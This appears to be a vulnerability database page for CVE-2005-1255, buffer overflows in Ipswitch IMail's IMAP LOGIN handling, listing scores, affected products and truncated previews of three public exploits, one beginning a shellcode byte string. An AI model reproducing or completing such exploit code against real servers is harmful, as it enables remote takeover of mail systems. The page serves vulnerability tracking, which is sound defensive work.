10
CVSSv2

CVE-2005-1255

Published: 25/05/2005 Updated: 15/11/2008
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple stack-based buffer overflows in the IMAP server in IMail 8.12 and 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allow remote malicious users to execute arbitrary code via a LOGIN command with (1) a long username argument or (2) a long username argument that begins with a special character.

Vulnerable Product Search on Vulmon Subscribe to Product

ipswitch imail 8.12

ipswitch imail 8.13

ipswitch ipswitch collaboration suite

ipswitch imail server

Exploits

# IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope # June 2005 # Confidential! use IO::Socket; # 316 bytes $cbsc = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49" "\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC ...
/* IpSwitch IMAP Server LOGON stack overflow Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works The reason you see no SP2 or 2003 offsets is because of Windows SEH checks Thats right, in this one situation, They've stopped hackers from exploiting t ...
/* Dreatica-FXP crew * * ---------------------------------------- * Target : Ipswitch IMAIL Server IMAPD 713 - 820 exploit * Site : wwwipswitchcom * Found by : iDEFENSE Security (labsidefensecom/intelligence/vulnerabilities/displayphp?id=243) * ---------------------------------------- * Exploit date ...